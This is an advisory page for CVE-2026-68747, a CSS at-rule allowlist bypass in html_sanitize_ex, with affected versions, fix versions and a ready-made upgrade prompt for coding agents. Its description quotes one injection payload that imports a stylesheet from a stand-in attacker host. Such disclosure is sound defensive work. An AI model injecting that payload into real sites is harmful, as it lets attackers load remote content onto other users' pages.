# CVE-2026-68747: CSS sanitizer allowlist bypass in html_sanitize_ex via non-declaration input

> An attacker can inject malicious CSS at-rules, such as remote imports, bypassing the allowlist in the html_sanitize_ex library.

- **Severity:** Low 2.3 (`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N`)
- **Exploited in the wild:** Not known
- **Login needed:** Not needed
- **Attackable:** Over the internet
- **Victim action needed:** A user has to click or open something
- **Fix available:** Yes
- **Published:** 6 Aug 2026
- **Updated:** 19 Aug 2026
- **Also known as:** EEF-CVE-2026-68747, GHSA-87v2-pfhj-r5x7, GHSA-g72r-5wgp-6532

## What is CVE-2026-68747?

CVE-2026-68747 is a low-severity cross-site scripting vulnerability in rrrene html_sanitize_ex, published on 6 Aug 2026. An attacker can exploit it over the internet without logging in, and only if a user opens a file or follows a link.

### Official description

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in the CSS scrubber in rrrene html_sanitize_ex allows an unauthenticated remote attacker to inject CSS at-rules, including an import of a remote stylesheet, into a page served to other users. HtmlSanitizeEx.Scrubber.CSS.scrub/1 applies its property and value allowlist through a Regex.replace over substrings matching a property: value declaration pattern, so input that does not match that pattern is never inspected and is copied to the output unchanged. @import url(//attacker.example/style.css); survives, while the same URL inside a background: url(...) declaration is removed.

Element boundaries are resolved before the scrubber runs, so injected content does not escape the <style> element and no script executes.

This issue affects html_sanitize_ex: from 0.3.1 before 1.4.5 and from 1.5.0-rc.0 before 1.5.4.

Weakness: CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component)

## Which versions are affected by CVE-2026-68747?

1 open source package ship an affected version, including html_sanitize_ex. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `html_sanitize_ex` | Hex | From 0.3.1 | 1.4.5, 1.5.4 |

Products: Rrrene Htmlsanitizeex.

## How do I fix CVE-2026-68747?

Upgrade html_sanitize_ex to a fixed version for your release line: 1.4.5 or 1.5.4.

## Is CVE-2026-68747 being exploited?

There is no known exploitation of CVE-2026-68747 in the wild and no public exploit code.

## Other vulnerabilities in rrrene html_sanitize_ex

- [CVE-2026-68749](https://insights.sbomify.com/CVE-2026-68749/): Quadratic regex backtracking in the html_sanitize_ex CSS scrubber allows CPU-exhaustion denial of service (high 8.2)
- [CVE-2026-68750](https://insights.sbomify.com/CVE-2026-68750/): Quadratic sibling re-flattening in the html_sanitize_ex traversal engine allows CPU-exhaustion denial of service (high 8.2)
- [CVE-2026-66370](https://insights.sbomify.com/CVE-2026-66370/): html_sanitize_ex HTML5 scrubber keeps attacker-supplied form-association attributes, allowing form hijacking (medium 4.8)
- [CVE-2026-66829](https://insights.sbomify.com/CVE-2026-66829/): html_sanitize_ex HTML5 scrubber keeps attacker-supplied meta refresh, allowing forced cross-origin redirection (low 2.3)
- [CVE-2026-66843](https://insights.sbomify.com/CVE-2026-66843/): html_sanitize_ex HTML5 scrubber keeps attacker-supplied `<object>` elements, allowing untrusted content embedding (low 2.3)

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2026-68747 and fix it if it is affected.

What it is: CVE-2026-68747 is a low-severity cross-site scripting vulnerability in rrrene html_sanitize_ex, published on 6 Aug 2026. An attacker can exploit it over the internet without logging in, and only if a user opens a file or follows a link.
Exploitation: There is no known exploitation of CVE-2026-68747 in the wild and no public exploit code.

Affected packages and fixed versions:
- html_sanitize_ex (Hex): affected from 0.3.1; fixed in 1.4.5, 1.5.4

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2026-68747/ (Markdown: https://insights.sbomify.com/CVE-2026-68747/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2026-68747
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-68747
- OSV: https://osv.dev/vulnerability/CVE-2026-68747

---
From sbomify Insights: https://insights.sbomify.com/CVE-2026-68747/
Summaries are generated and may contain mistakes; the official description above is the record.
